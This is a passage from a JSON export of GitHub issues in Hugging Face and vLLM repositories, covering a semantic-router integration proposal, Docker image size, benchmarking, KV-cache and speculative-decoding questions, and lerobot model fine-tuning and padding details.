**Dashboard Integration**: vLLM-SR dashboard provides monitoring and analytics\n\n### About vLLM Semantic Router\n\n**vLLM Semantic Router** is an intelligent routing system that embodies the **Mixture-of-Models (MoM)** philosophy, with modelName (**MoM**):\n\n```shell\ncurl -X POST http://localhost:8801/v1/chat/completions \\\n -H \"Content-Type: application/json\" \\\n -d '{\n \"model\": \"MoM\",\n \"messages\": [\n {\"role\": \"user\", \"content\": \"What is the derivative of x^2?\"}\n ]\n }'\n```\n\n- **Intelligent Routing**: Routes requests to the optimal model based on semantic understanding of the query, not just keyword matching\n- **Semantic Caching**: Leverages semantic similarity to cache responses, dramatically reducing latency for similar queries (not just exact matches)\n- **Semantic Chain Architecture**: Evolving toward a composable semantic chain where all stages are orchestrated in an extensible pipeline, enabling future enhancements and custom stage integration in work-in-progress \"SemanticChain\".\n- **Three-Stage Pipeline** (Extensible & Composable):\n - **Stage 1 - Prompt Guard**: Security-first approach with jailbreak detection and PII protection\n - **Stage 2 - Router Memory**: Intelligent semantic caching for performance optimization\n - **Stage 3 - Smart Routing**: Multi-level intelligent routing combining three complementary strategies:\n - **Domain Understanding**: Semantic classification of queries into domains (math, coding, general, etc.)\n - **Similarity-Based Routing**: Semantic similarity matching to route similar queries to optimal models\n - **Keyword-Based Routing**: Keyword pattern matching for explicit intent detection\n - These three routing strategies work together to provide comprehensive query understanding and optimal model selection\n - Future stages can be added to the pipeline without disrupting existing functionality\n- **Mixture-of-Models Philosophy**: Recognizes that no single model is optimal for all tasks. By intelligently routing different types of queries to different specialized models, it achieves:\n - Better accuracy through task-specific model selection\n - Cost optimization by using smaller models for simple tasks\n - Performance improvement through semantic understanding\n - Transparency via chain-of-thought visibility\n- **Production-Ready**: Battle-tested with comprehensive error handling, monitoring, and dashboard support\n- **Open Source**: vLLM Community-driven development with active maintenance and feature additions\n\n---\n\n## 2. Goals\n\n### Primary Goals\n\n- \u2705 Integrate vLLM Semantic Router as a new MoM routing option\n- \u2705 Extract and store chain-of-thought (CoT) metadata from vLLM-SR responses\n- \u2705 Support both Omni and MoM routers coexisting in the same system\n- \u2705 Expose CoT information to frontend for visualization\n\n### Secondary Goals\n\n- \u2705 Support A/B testing between Omni and MoM routers\n- \u2705 Integrate with vLLM-SR dashboard for monitoring\n\n---\n\n## 3. Non-Goals\n\n- \u274c Replace Omni router entirely (maintain coexistence)\n- \u274c Modify vLLM Semantic Router codebase\n- \u274c Implement custom semantic caching in HuggingChat (use vLLM-SR's caching)\n- \u274c Create new dashboard (integrate with existing vLLM-SR dashboard)\n- \u274c Support non-OpenAI-compatible endpoints for MoM\n\n---\n\n## 4. Design Principles\n\n### 1. 
**Backward Compatibility**\n\n- Existing Omni router functionality remains unchanged\n- No breaking changes to current APIs or configurations\n- Both routers can be configured independently\n\n### 2. **Transparency**\n\n- CoT inf", "url": "https://github.com/huggingface/chat-ui/issues/1947", "state": "open", "labels": [ "enhancement" ], "created_at": "2025-10-19T08:17:14Z", "updated_at": "2025-10-20T11:12:30Z", "comments": 3, "user": "Xunzhuo" }, { "repo": "huggingface/tokenizers", "number": 1877, "title": "encode bytes directly", "body": "Is there a way to directly encode bytes with a BPE-based HF tokenizer without having to decode the bytes into a string first? ", "url": "https://github.com/huggingface/tokenizers/issues/1877", "state": "open", "labels": [], "created_at": "2025-10-19T03:30:39Z", "updated_at": "2025-11-28T07:43:18Z", "comments": 2, "user": "tsengalb99" }, { "repo": "vllm-project/vllm", "number": 27154, "title": "[Installation]: How to reduce the vllm image", "body": "### Your current environment\n\nHi,\n\nI looked at docker pull vllm/vllm-openai:latest \u2014 the image is around 12 GB. I\u2019m exploring ways to reduce the vLLM image size specifically for NVIDIA L40s (I use linux amd64). Any ideas?\nDoes building vllm from source help to reduce the image?\n\nHere\u2019s what I\u2019ve tried so far (but not sure how to install flashinfer):\n```\nFROM nvidia/cuda:12.1.0-runtime-ubuntu22.04\n\n# Install Python and pip\nRUN apt-get update && apt-get install -y python3 python3-pip && \\\n apt-get clean && rm -rf /var/lib/apt/lists/*\n\n# Install only vLLM and production dependencies\nRUN pip3 install --no-cache-dir vllm\n\n# Set CUDA arch for L40S (8.9)\nENV TORCH_CUDA_ARCH_LIST=\"8.9+PTX\"\n\n# Expose API port\nEXPOSE 8000\n\nENTRYPOINT [\"python3\", \"-m\", \"vllm.entrypoints.openai.api_server\"]\n```\n\nMore info:\nhttps://discuss.vllm.ai/t/current-vllm-docker-image-size-is-12-64gb-how-to-reduce-it/1204/4\nhttps://docs.vllm.ai/en/latest/deployment/docker.html#building-vllm-s-docker-image-from-source\npr: https://github.com/vllm-project/vllm/pull/22377\n\n### How you are installing vllm\n\n```sh\npip install -vvv vllm\n```\n\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/27154", "state": "open", "labels": [ "installation" ], "created_at": "2025-10-18T17:52:07Z", "updated_at": "2025-10-20T17:45:39Z", "comments": 4, "user": "geraldstanje" }, { "repo": "vllm-project/vllm", "number": 27153, "title": "[Feature]: Allow vllm bench serve in non-streaming mode with /completions API", "body": "### \ud83d\ude80 The feature, motivation and pitch\n\nvLLM\u2019s bench serve currently supports recording benchmark results only in streaming mode, recording metrics like TTFT, TPOT, ITL, etc. For my use case benchmarking [llm-d](https://github.com/llm-d/llm-d), which uses vLLM, I would like to enable vllm bench serve in non-streaming mode for the openai backend, recording only non-streaming latency metrics like E2E Latency. 
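For concreteness, the measurement I have in mind is just timing one non-streaming POST end to end. A rough sketch, not vLLM's actual benchmark code (endpoint and model name are placeholders):\n```\nimport asyncio\nimport time\n\nimport aiohttp\n\nasync def main():\n    payload = {\"model\": \"my-model\", \"prompt\": \"Hello\", \"max_tokens\": 64, \"stream\": False}\n    async with aiohttp.ClientSession() as session:\n        start = time.perf_counter()\n        # One request, one JSON body back: only E2E latency is observable,\n        # so TTFT/TPOT/ITL simply do not apply.\n        async with session.post(\"http://localhost:8000/v1/completions\", json=payload) as resp:\n            await resp.json()\n        print(f\"E2E latency: {time.perf_counter() - start:.3f}s\")\n\nasyncio.run(main())\n```\n\n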
Overall, the changes required would be as follows:\n\n* Add a new Async Request Function - `async_request_openai_completions_non_streaming()` function in [`vllm/vllm/benchmarks/lib/endpoint_request_func.py`](https://github.com/vllm-project/vllm/blob/main/vllm/benchmarks/lib/endpoint_request_func.py) to support parsing of non-streaming vllm outputs.\n\n* Add a new benchmark argument: `benchmark_streaming`. If `benchmark_streaming` is set to False for the `openai` backend, then the above function `async_request_openai_completions_non_streaming()` is called instead of `async_request_openai_completions`.\n\n* Either modify [`vllm/benchmarks/serve.py`](https://github.com/vllm-project/vllm/blob/main/vllm/benchmarks/serve.py) or design a new benchmark script to calculate and save metrics, excluding streaming-only metrics like TTFT, TPOT and ITL.\n\nHappy to discuss and create PRs for the above implementation. Looking forward to thoughts and feedback.\n\n### Alternatives\n\nAnother option I'm considering is using [benchmark_throughput.py](https://github.com/vllm-project/vllm/blob/main/benchmarks/benchmark_throughput.py). However, it relies on the offline LLM library which does not serve my use-case of benchmarking the vllm server in non-streaming mode.\n\n\n### Additional context\n\n_No response_\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/27153", "state": "open", "labels": [ "feature request" ], "created_at": "2025-10-18T17:47:44Z", "updated_at": "2025-10-18T20:50:49Z", "comments": 0, "user": "susiejojo" }, { "repo": "huggingface/candle", "number": 3137, "title": "Strategic Discussion: Flicker's Hybrid Architecture for Lightweight Inference + Advanced Training", "body": "# Strategic Discussion: Flicker's Hybrid Architecture Evolution\n\n## Overview\nThis issue proposes a comprehensive strategic discussion about flicker's positioning and architecture evolution. The detailed proposal is documented in `STRATEGIC_DISCUSSION_PROPOSAL.md`.\n\n## Context\nDuring analysis of flicker's capabilities vs PyTorch, a critical strategic question emerged: Should flicker be primarily a **lightweight inference engine** or evolve into a **comprehensive training framework**?\n\n## Proposed Solution: Hybrid Architecture\nInstead of choosing one direction, we propose a dual-track approach:\n- **flicker-core**: Lightweight inference (current focus) \n- **flicker-train**: Advanced training features\n- **Feature Gates**: Granular control for specific capabilities\n\n## Key Strategic Questions\n\n### 1. Technical Feasibility\n- Is zero-copy gradient system feasible with Rust ownership?\n- How do we implement compile-time training validation?\n- What's the best approach for async-distributed training?\n\n### 2. Market Positioning \n- Does hybrid approach make sense for flicker's goals?\n- How do we balance inference vs training development resources?\n- Will this attract both inference and training users?\n\n### 3. Implementation Priority\n- Which advanced training features should we implement first?\n- How do we ensure seamless transition from inference to training?\n- What performance targets should we set vs PyTorch?\n\n## Revolutionary Differentiators\nThe proposal identifies 4 major areas where Rust could revolutionize ML:\n1. 
**Zero-Copy Gradient Systems** - Gradients as views, not copies\n2. **Compile-Time Training Validation** - Catch training errors at compile time \n3. **Async-First Training Infrastructure** - True concurrency without GIL\n4. **SIMD-Optimized Research Features** - Hand-optimized kernels impossible in Python\n\n## Benefits\n\u2705 Preserves current lightweight inference advantages\n\u2705 Enables advanced training capabilities unique to Rust \n\u2705 Creates natural upgrade path for users\n\u2705 Positions flicker as both practical tool and research platform\n\n## Next Steps\n1. **Enable GitHub Discussions** to facilitate community input\n2. **Review detailed proposal** in `STRATEGIC_DISCUSSION_PROPOSAL.md`\n3. **Gather feedback** from community on strategic direction\n4. **Validate technical feasibility** of proposed features\n5. **Create implementation roadmap** based on consensus\n\n## Discussion Document\n\ud83d\udccb **Full Proposal**: See `STRATEGIC_DISCUSSION_PROPOSAL.md` for comprehensive analysis including:\n- Current state analysis\n- PyTorch comparison\n- Technical implementation details\n- Code examples of revolutionary features\n- Trade-offs and considerations\n- Community input questions\n\n## Call for Input\nThis represents a potential major evolution for flicker. Community input is essential to validate:\n- Strategic direction alignment with user needs\n- Technical feasibility of proposed features \n- Implementation priority and resource allocation\n- Market positioning effectiveness\n\n**Please review the detailed proposal and share your thoughts on flicker's strategic future.**\n\n---\n*This issue will be converted to a GitHub Discussion once discussions are enabled on the repository.*", "url": "https://github.com/huggingface/candle/issues/3137", "state": "closed", "labels": [], "created_at": "2025-10-18T17:27:24Z", "updated_at": "2025-10-21T16:18:51Z", "comments": 1, "user": "jagan-nuvai" }, { "repo": "huggingface/lerobot", "number": 2245, "title": "release 0.4.0 and torch 2.8.0", "body": "Hello Lerobot Team! 
:) \nQuick question, do you have a time estimate for:\n\n- lerobot release 0.4.0 (ie next stable release using the new v30 data format)\n- bumping torch to 2.8 \n\nThanks a lot in advance!\n", "url": "https://github.com/huggingface/lerobot/issues/2245", "state": "closed", "labels": [ "question", "dependencies" ], "created_at": "2025-10-18T16:57:07Z", "updated_at": "2025-10-19T18:34:47Z", "user": "antoinedandi" }, { "repo": "huggingface/lerobot", "number": 2242, "title": "Is it no longer possible to fine-tune the previously used \u03c00 model?", "body": "I previously trained a model using the following command for fine-tuning:\n\n`lerobot-train --dataset.repo_id=parkgyuhyeon/slice-clay --policy.path=lerobot/pi0 --output_dir=outputs/train/pi0_slice-clay --job_name=pi0_slice-clay --policy.device=cuda --wandb.enable=false --wandb.project=lerobot --log_freq=10 --steps=50000 --policy.repo_id=parkgyuhyeon/pi0_slice-clay --policy.push_to_hub=false`\n\n\nHowever, after the release of \u03c00.5, I noticed that the new example command includes additional arguments like:\n\n```\n--policy.repo_id=your_repo_id \\\n--policy.compile_model=true \\\n--policy.gradient_checkpointing=true \\\n--policy.dtype=bfloat16 \\\n```\n\n\nIt seems that some new options have been added.\nDoes this mean the model I fine-tuned earlier using \u03c00 can no longer be used?", "url": "https://github.com/huggingface/lerobot/issues/2242", "state": "closed", "labels": [ "question", "policies" ], "created_at": "2025-10-18T08:42:35Z", "updated_at": "2025-10-20T00:18:03Z", "user": "pparkgyuhyeon" }, { "repo": "huggingface/lerobot", "number": 2239, "title": "Models trained using openpi pi0.5 on Lerobot's pi0.5", "body": "Hi, can I check if models trained using the [pytorch port of openpi's pi0.5](https://github.com/Physical-Intelligence/openpi?tab=readme-ov-file#pytorch-support) are compatible with lerobot's defination of pi0.5?\n\nThanks!", "url": "https://github.com/huggingface/lerobot/issues/2239", "state": "open", "labels": [ "question", "policies" ], "created_at": "2025-10-18T02:01:45Z", "updated_at": "2025-10-18T10:54:06Z", "user": "brycegoh" }, { "repo": "huggingface/lerobot", "number": 2228, "title": "Trossen WidowX AI model, depth cameras and tests", "body": "Hi,\n\nWould you be open to receive pull requests to support more recent trossen robotics setups as well as depth cameras? I think for the robot part the pattern is quite well established. 
For depth cameras, we solved it by tweaking the dataset utils a bit.\n\nOur implementation is fairly tested.", "url": "https://github.com/huggingface/lerobot/issues/2228", "state": "closed", "labels": [ "question", "robots" ], "created_at": "2025-10-17T09:32:22Z", "updated_at": "2025-10-31T19:15:25Z", "user": "lromor" }, { "repo": "vllm-project/vllm", "number": 27090, "title": "[Usage]: Does vLLM support a data-parallel group spanning multiple nodes when starting an online service?", "body": "### Your current environment\n\n```text\nThe output of `python collect_env.py`\n```\n\n\n### How would you like to use vllm\n\nDoes vLLM support a data-parallel group spanning multiple nodes when starting an online service?\n\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/27090", "state": "open", "labels": [ "usage" ], "created_at": "2025-10-17T09:15:04Z", "updated_at": "2025-10-20T02:37:19Z", "comments": 2, "user": "KrisLu999" }, { "repo": "vllm-project/vllm", "number": 27086, "title": "[Bug]: After enabling P-D Disaggregation, the final output results are not entirely identical.", "body": "### Your current environment\n\nvllm VERSION: 0.10.1\n\n### \ud83d\udc1b Describe the bug\n\nWhen I fixed the random seed and ensured all environment variables were consistent, I noticed that launching PD separation with the same configuration produced inconsistent final outputs. This phenomenon may require multiple attempts to fully manifest. I have a question: Is this behavior normal? (under temperature=0 conditions)\n\nvllm startup script (D). The startup process for P nodes is almost identical, except for the use of \"kv_producer\".\n```\nVLLM_CFG=(\n --trust-remote-code\n --data-parallel-size 1\n --tensor-parallel-size 8\n --no-enable-prefix-caching\n --no-enable-chunked-prefill\n --kv-transfer-config '{\"kv_connector\":\"NixlConnector\",\"kv_role\":\"kv_consumer\"}'\n)\n```\n\nThe request, with temperature=0:\n```\ncurl -X POST -s http://${HOST_PORT}/v1/completions \\\n-H \"Content-Type: application/json\" \\\n-d '{\n \"model\": \"base_model\",\n \"prompt\": \"xxxx\", # The prompt is identical for every request, and this prompt will also appear.\n \"max_tokens\": 1000,\n \"temperature\": 0,\n \"stream\": true\n}'\nprintf \"\\n\"\n```\n\nMy question is: does PD separation also have some probability of producing non-identical outputs at some step when temperature=0? If this is a normal phenomenon, what causes it? If this is a bug, what might be causing it?\n\nLooking forward to your responses. 
Thank you.\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/27086", "state": "open", "labels": [ "bug" ], "created_at": "2025-10-17T07:56:41Z", "updated_at": "2025-10-20T09:16:21Z", "comments": 4, "user": "freedom-cui" }, { "repo": "huggingface/lerobot", "number": 2227, "title": "How to easily run inference with a trained model", "body": "Hello, and thank you for sharing such an inspiring project!\n\nI\u2019m currently working with a 7-DoF robotic arm (6 joint axes + 1 gripper) and generating datasets through video recordings for training on smolVLA. Since there\u2019s still some ongoing engineering work related to dataset generation, I\u2019d like to start by understanding how the inference pipeline is implemented.\n\nI have successfully verified the training workflow using the [lerobot/svla_so100_pickplace](https://huggingface.co/datasets/lerobot/svla_so100_pickplace) dataset and produced a trained model. Now, I\u2019m wondering if there is a way to quickly load the trained model and perform inference, similar to how OpenVLA provides a simple demo on Hugging Face \u2014 where the model can be loaded and tested with just a few lines of code.\n\nFor OpenVLA example:\n```\nfrom transformers import AutoModelForVision2Seq, AutoProcessor\nfrom PIL import Image\nimport torch\n\n# Load Processor & VLA\nprocessor = AutoProcessor.from_pretrained(\"openvla/openvla-7b\", trust_remote_code=True)\nvla = AutoModelForVision2Seq.from_pretrained(\n \"openvla/openvla-7b\", \n attn_implementation=\"flash_attention_2\", # [Optional] Requires `flash_attn`\n torch_dtype=torch.bfloat16, \n low_cpu_mem_usage=True, \n trust_remote_code=True\n).to(\"cuda:0\")\n\n# Grab image input & format prompt\nimage: Image.Image = get_from_camera(...)\nprompt = \"In: What action should the robot take to {}?\\nOut:\"\n\n# Predict Action (7-DoF; un-normalize for BridgeData V2)\ninputs = processor(prompt, image).to(\"cuda:0\", dtype=torch.bfloat16)\naction = vla.predict_action(**inputs, unnorm_key=\"bridge_orig\", do_sample=False)\n\n# Execute...\nrobot.act(action, ...)\n```\nI would be very grateful if you could share any related information or references.", "url": "https://github.com/huggingface/lerobot/issues/2227", "state": "open", "labels": [ "question" ], "created_at": "2025-10-17T05:41:15Z", "updated_at": "2025-12-16T02:57:00Z", "user": "Biz-Joe" }, { "repo": "huggingface/lerobot", "number": 2224, "title": "Can i just modify the json the pretrained policy to adapt it to my own robot?", "body": "I just want to know if i can just modify the config json(shape of state, size of image .etc) to adapt the model to inference in my modified robot(have different number of feetect and different image resolution)?", "url": "https://github.com/huggingface/lerobot/issues/2224", "state": "open", "labels": [ "question", "policies" ], "created_at": "2025-10-17T01:33:32Z", "updated_at": "2025-10-20T16:40:26Z", "user": "shs822" }, { "repo": "huggingface/lerobot", "number": 2221, "title": "Question about pre-trained weights usability and performance on Hugging Face models", "body": "Hello,\n\nI would like to ask whether the weights provided on Hugging Face (for example, under the lerobot author page) can be directly downloaded and used for inference, or if they must be 
fine-tuned before achieving reasonable performance.\n\nWhen I directly load and evaluate the models (e.g., lerobot/smolvla_base or lerobot/pi05_libero_base), the performance appears extremely poor, almost random. I\u2019m wondering if this is expected behavior or if I might have made a mistake in my setup.\n\nHere\u2019s the list of models I found on Hugging Face:\n\nlerobot/smolvla_base\nlerobot/pi05_base\nlerobot/diffusion_pusht\nlerobot/pi0_base\nlerobot/pi05_libero_base\nlerobot/act_aloha_sim_transfer_cube_human\nlerobot/vqbet_pusht\nlerobot/diffusion_pusht_keypoints\nlerobot/act_aloha_sim_insertion_human\nlerobot/pi0_libero_base\nlerobot/pi05_libero_finetuned\nlerobot/pi05_libero_finetuned_quantiles\nlerobot/pi0_libero_finetuned\n\n\nAre the *_base models supposed to be general pre-trained checkpoints that require downstream fine-tuning (e.g., on LIBERO), while the *_finetuned ones are ready for evaluation?\n\nThank you in advance for your clarification!", "url": "https://github.com/huggingface/lerobot/issues/2221", "state": "closed", "labels": [ "question" ], "created_at": "2025-10-16T14:14:39Z", "updated_at": "2025-10-31T16:26:45Z", "user": "MichaelWu99-lab" }, { "repo": "vllm-project/vllm", "number": 27021, "title": "[Usage]: Need guidance reproducing benchmark results from PR #25337 \u2014 results differ significantly from reported data", "body": "## Background\nRecently, we have been working on optimizing the position computation for multimodal models in vLLM.\n\nDuring benchmarking, we noticed that our results were not as expected.\n\nTo investigate, we decided to reproduce the benchmark results from [PR #25337](https://github.com/vllm-project/vllm/pull/25337), comparing the performance before and after that PR was merged into the main branch.\n\n- Before PR commit: cf56cf78b47e5f9b6a81ce0d50a94f9291922315\n\n- After PR commit: 30d08911f7cf78287f8da003ddcc99f6ef196f9f\n \n \"Image\"\n\nHowever, our reproduced results differ **significantly** from the performance data reported in the PR.\n\nWe\u2019d like to understand whether this discrepancy may be caused by hardware differences, model choice, or benchmark setup.\n\n**Who can help guide me?**\n\n## Model and Environment\n- Model used: Qwen/Qwen3-VL-30B-A3B-Instruct-FP8(The modelQwen3-VL-4B used in the PR could not be found on Hugging Face.)\n\n- GPU: NVIDIA A100 PCIe\n\n- vLLM startup command:\n```bash\nvllm serve \"Qwen/Qwen3-VL-30B-A3B-Instruct-FP8\" \\\n --trust-remote-code \\\n --gpu-memory-utilization 0.9 \\\n --max-model-len 16384\n```\n\n## Benchmark Command\n```bash\nvllm bench serve \\\n --backend openai-chat \\\n --model \"Qwen/Qwen3-VL-30B-A3B-Instruct-FP8\" \\\n --base-url \"http://localhost:8000\" \\\n --endpoint \"/v1/chat/completions\" \\\n --dataset-name \"hf\" \\\n --dataset-path \"lmarena-ai/VisionArena-Chat\" \\\n --num-prompts 100 \\\n --request-rate 10 \\\n --save-result \\\n --result-dir benchmarks_results \\\n --result-filename test.json\n```\n\n## Our Benchmark Results\n### Before PR #25337\n```text\n============ Serving Benchmark Result ============\nSuccessful requests: 100\nRequest rate configured (RPS): 10.00\nBenchmark duration (s): 16.91\nTotal input tokens: 5280\nTotal generated tokens: 11522\nRequest throughput (req/s): 5.91\nOutput token throughput (tok/s): 681.42\nPeak output token throughput (tok/s): 2225.00\nPeak concurrent requests: 97.00\nTotal Token throughput (tok/s): 993.68\n---------------Time to First Token----------------\nMean TTFT (ms): 1176.13\nMedian TTFT (ms): 1185.79\nP99 TTFT 
(ms): 2178.91\n-----Time per Output Token (excl. 1st token)------\nMean TPOT (ms): 88.39\nMedian TPOT (ms): 78.68\nP99 TPOT (ms): 392.01\n---------------Inter-token Latency----------------\nMean ITL (ms): 77.30\nMedian ITL (ms): 42.31\nP99 ITL (ms): 581.15\n==================================================\n```\n\n### After PR #25337\n```text\n============ Serving Benchmark Result ============\nSuccessful requests: 100\nRequest rate configured (RPS): 10.00\nBenchmark duration (s): 16.89\nTotal input tokens: 5280\nTotal generated tokens: 11640\nRequest throughput (req/s): 5.92\nOutput token throughput (tok/s): 689.02\nPeak output token throughput (tok/s): 2178.00\nPeak concurrent requests: 97.00\nTotal Token throughput (tok/s): 1001.57\n---------------Time to First Token----------------\nMean TTFT (ms): 1193.52\nMedian TTFT (ms): 1285.23\nP99 TTFT (ms): 2111.41\n-----Time per Output Token (excl. 1st token)------\nMean TPOT (ms): 88.84\nMedian TPOT (ms): 78.00\nP99 TPOT (ms): 344.25\n---------------Inter-token Latency----------------\nMean ITL (ms): 76.89\nMedian ITL (ms): 42.30\nP99 ITL (ms): 597.42\n==================================================\n```\n\n## Reference: Benchmark Results from PR #25337\n### Main branch\n```text\n============ Serving Benchmark Result ============\nSuccessful requests: 1000 \nRequest rate configured (RPS): 10.00 \nBenchmark duration (s): 101.85 \nTotal input tokens: 94327 \nTotal generated tokens: 120882 \nRequest throughput (req/s): 9.82 \nOutput token throughput (tok/s): 1186.81 \nPeak output token throughput (tok/s): 2862.00 \nPeak concurrent requests: 133.00 \nTotal Token throughput (tok/s): 2112.91 \n---------------Time to First Token----------------\nMean TTFT (ms): 229.53 \nMedian TTFT (ms): 180.19 \nP99 TTFT (ms): 928.83 \n-----Time per Output Token (excl. 1st token)------\nMean TPOT (ms): ", "url": "https://github.com/vllm-project/vllm/issues/27021", "state": "open", "labels": [ "usage" ], "created_at": "2025-10-16T12:31:03Z", "updated_at": "2025-10-17T05:46:32Z", "comments": 5, "user": "deitxfge" }, { "repo": "vllm-project/vllm", "number": 27017, "title": "[Doc]: KV Cache Memory allocations", "body": "### \ud83d\udcda The doc issue\n\nHello,\nWhen serving a model via vLLM for text(token) generation:\n\n1. Before a new request gets scheduled, does vLLM check if KV cache for a sequence length of `max_model_len` is available for that new request or does it check if KV cache for a sequence length of `input prompt + max_tokens` (if it's less than _max_model_length_) is available for the request? In case the request does not specify a _max_tokens_ does it default to 16?\n2. In case the required KV cache memory is not available, does the server wait until it is available to schedule that new request?\n3. When exactly is the KV cache allocated for a particular request? Do the KV cache blocks get allocated after computing the number of new blocks required for all current requests after each generation step of the model, as mentioned in this [blog post](https://www.aleksagordic.com/blog/vllm)? i.e. the KV cache block is not fully allocated upfront based on the point [1] calculation instead incrementally allocated since the request could finish before it reaches the _max_tokens_ or _max_model_length_ limit?\n\n4. 
I am trying to understand if the server concurrency can be more than the one specified in the server startup logs (based on the _max_model_len_) and get a clearer understanding of request scheduling.\nExample logs:\n ```\n GPU KV cache size: {X} tokens\n Maximum concurrency for {max_model_len} tokens per request: Y\n ```\n5. The KV cache token and concurrency estimations vLLM gives in the startup logs for the **_Qwen-235B MoE_** model do not match the below formula for `tensor_parallel_size` of 8. It does match for `tensor_parallel_size` of 4 and in general for a different model like **_Llama-70B_**. Is the below formula missing something specifically for the Qwen-235B models at `tensor_parallel_size` of 8?\n```\nnumber of layers * number of KV heads * head dimension * precision/8 * 2 (for K & V) * seq_len bytes\n\nOR \n\n(number of layers * number of KV heads * head dimension * precision/8 * 2 (for K & V) * seq_len)/tensor_parallel_size bytes per GPU\n\ni.e. for Qwen-235B MoE\n(94 * 4 * 128 * 16/8 * 2 * seq_len)/8 bytes per GPU\n```\n\nThanks!\n\n### Suggest a potential alternative/fix\n\n_No response_\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/27017", "state": "closed", "labels": [ "documentation" ], "created_at": "2025-10-16T11:43:43Z", "updated_at": "2025-11-04T11:08:02Z", "comments": 7, "user": "sneha5gsm" }, { "repo": "vllm-project/vllm", "number": 27011, "title": "[Usage]: Running GLM4.5-Air with Speculative Decoding", "body": "### Your current environment\n```\nThe output of `python collect_env.py`\n```\n### How would you like to use vllm\nI want to run inference of [GLM-4.5-Air](https://huggingface.co/zai-org/GLM-4.5-Air-FP8) with speculative decoding. The [GLM 4.5](https://huggingface.co/zai-org/GLM-4.5) page mentions `All models use MTP layers and specify --speculative-num-steps 3 --speculative-eagle-topk 1 --speculative-num-draft-tokens 4 to ensure competitive inference speed.`\nThey gave examples of how to use speculative decoding in sglang, but not in vLLM. I was wondering if it is supported in vLLM.\n### Before submitting a new issue...\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/27011", "state": "open", "labels": [ "usage" ], "created_at": "2025-10-16T10:17:54Z", "updated_at": "2025-10-16T10:23:01Z", "comments": 0, "user": "aqx95" }, { "repo": "vllm-project/vllm", "number": 27006, "title": "[Usage]: In vLLM version 0.8.5, when I send an HTTP image URL directly, the model cannot recognize the image content, but it works correctly when I use a base64-encoded image. I\u2019d like to understand why this happens.", "body": "### Your current environment\n\n```text\nThe output of `python collect_env.py`\n```\n\n\n### How would you like to use vllm\n\nI want to run inference of a [specific model](put link here). 
I don't know how to integrate it with vllm.\n\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/27006", "state": "open", "labels": [ "usage" ], "created_at": "2025-10-16T08:09:29Z", "updated_at": "2025-10-16T10:33:49Z", "comments": 4, "user": "Lislttt" }, { "repo": "huggingface/lerobot", "number": 2218, "title": "image pad value in pi0/pi05", "body": "### System Info\n\n```Shell\nthe latest lerobot version\n```\n\n### Information\n\n- [ ] One of the scripts in the examples/ folder of LeRobot\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\ndef resize_with_pad_torch( # see openpi `resize_with_pad_torch` (exact copy)\n images: torch.Tensor,\n height: int,\n width: int,\n mode: str = \"bilinear\",\n) -> torch.Tensor:\n \"\"\"PyTorch version of resize_with_pad. Resizes an image to a target height and width without distortion\n by padding with black. If the image is float32, it must be in the range [-1, 1].\n\n Args:\n images: Tensor of shape [*b, h, w, c] or [*b, c, h, w]\n height: Target height\n width: Target width\n mode: Interpolation mode ('bilinear', 'nearest', etc.)\n\n Returns:\n Resized and padded tensor with same shape format as input\n \"\"\"\n # Check if input is in channels-last format [*b, h, w, c] or channels-first [*b, c, h, w]\n if images.shape[-1] <= 4: # Assume channels-last format\n channels_last = True\n if images.dim() == 3:\n images = images.unsqueeze(0) # Add batch dimension\n images = images.permute(0, 3, 1, 2) # [b, h, w, c] -> [b, c, h, w]\n else:\n channels_last = False\n if images.dim() == 3:\n images = images.unsqueeze(0) # Add batch dimension\n\n batch_size, channels, cur_height, cur_width = images.shape\n\n # Calculate resize ratio\n ratio = max(cur_width / width, cur_height / height)\n resized_height = int(cur_height / ratio)\n resized_width = int(cur_width / ratio)\n\n # Resize\n resized_images = F.interpolate(\n images,\n size=(resized_height, resized_width),\n mode=mode,\n align_corners=False if mode == \"bilinear\" else None,\n )\n\n # Handle dtype-specific clipping\n if images.dtype == torch.uint8:\n resized_images = torch.round(resized_images).clamp(0, 255).to(torch.uint8)\n elif images.dtype == torch.float32:\n resized_images = resized_images.clamp(-1.0, 1.0)\n else:\n raise ValueError(f\"Unsupported image dtype: {images.dtype}\")\n\n # Calculate padding\n pad_h0, remainder_h = divmod(height - resized_height, 2)\n pad_h1 = pad_h0 + remainder_h\n pad_w0, remainder_w = divmod(width - resized_width, 2)\n pad_w1 = pad_w0 + remainder_w\n\n # Pad\n constant_value = 0 if images.dtype == torch.uint8 else -1.0\n padded_images = F.pad(\n resized_images,\n (pad_w0, pad_w1, pad_h0, pad_h1), # left, right, top, bottom\n mode=\"constant\",\n value=constant_value,\n )\n\n # Convert back to original format if needed\n if channels_last:\n padded_images = padded_images.permute(0, 2, 3, 1) # [b, c, h, w] -> [b, h, w, c]\n\n return padded_images\n\n\n\n### Expected behavior\n\n image from lerobot range from 0 to 1 and dtype is float32 , so constant_value in this code is -1 not 0. 
